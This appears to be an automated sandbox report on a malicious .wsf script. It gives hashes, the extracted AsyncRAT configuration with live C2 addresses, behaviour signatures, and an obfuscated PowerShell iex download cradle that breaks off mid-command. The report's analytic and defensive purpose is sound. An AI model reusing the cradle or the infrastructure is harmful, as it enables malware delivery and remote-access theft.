Analysis
-
max time kernel
143s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
23/01/2024, 12:29
Static task
static1
Behavioral task
behavioral1
Sample
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf
Resource
win7-20231215-en
General
-
Target
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf
-
Size
144KB
-
MD5
d98237f1eb423d002ec4431002532420
-
SHA1
3c03b0e124cf15312a0cf43e1a74a3827b027e29
-
SHA256
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
-
SHA512
9f5b13ed4f562508635ead16e1976b05c79be6f94a6d95a8dac2ec538954c33e232682b3b2c1c637c1a928e8cc00c0589da834e41cd558df51c45eba01596a4f
-
SSDEEP
3072:LvvvvvvvvvvvkAAAAAAAAAAABvvvvvvvvvvvkAAAAAAAAAAAyvvvvvvvvvvvkAAn:QAAAAAAAAAAASAAAAAAAAAAAdAAAAAA3
Malware Config
Extracted
http://185.81.157.103/96/1.txt
Extracted
asyncrat
| Edit 3LOSH RAT
Default
185.81.157.183:9696
AsyncMutex_6SI8OkCPM
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral2/memory/4216-40-0x000001AAA3C40000-0x000001AAA3C74000-memory.dmp family_zgrat_v1 -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/1144-42-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4728 WScript.exe 10 3004 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4216 set thread context of 1144 4216 powershell.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3004 powershell.exe 3004 powershell.exe 4216 powershell.exe 4216 powershell.exe 4216 powershell.exe 4216 powershell.exe 1144 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 1144 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1144 RegSvcs.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 4728 wrote to memory of 3004 4728 WScript.exe 88 PID 4728 wrote to memory of 3004 4728 WScript.exe 88 PID 4564 wrote to memory of 2528 4564 WScript.exe 102 PID 4564 wrote to memory of 2528 4564 WScript.exe 102 PID 2528 wrote to memory of 4216 2528 cmd.exe 104 PID 2528 wrote to memory of 4216 2528 cmd.exe 104 PID 4216 wrote to memory of 2900 4216 powershell.exe 105 PID 4216 wrote to memory of 2900 4216 powershell.exe 105 PID 4216 wrote to memory of 2900 4216 powershell.exe 105 PID 4216 wrote to memory of 1144 4216 powershell.exe 106 PID 4216 wrote to memory of 1144 4216 powershell.exe 106 PID 4216 wrote to memory of 1144 4216 powershell.exe 106 PID 4216 wrote to memory of 1144 4216 powershell.exe 106 PID 4216 wrote to memory of 1144 4216 powershell.exe 106 PID 4216 wrote to memory of 1144 4216 powershell.exe 106 PID 4216 wrote to memory of 1144 4216 powershell.exe 106 PID 4216 wrote to memory of 1144 4216 powershell.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y(aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yGaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yM *aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y-aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yOaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y)NaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y.aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ybaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y).DaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ywaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï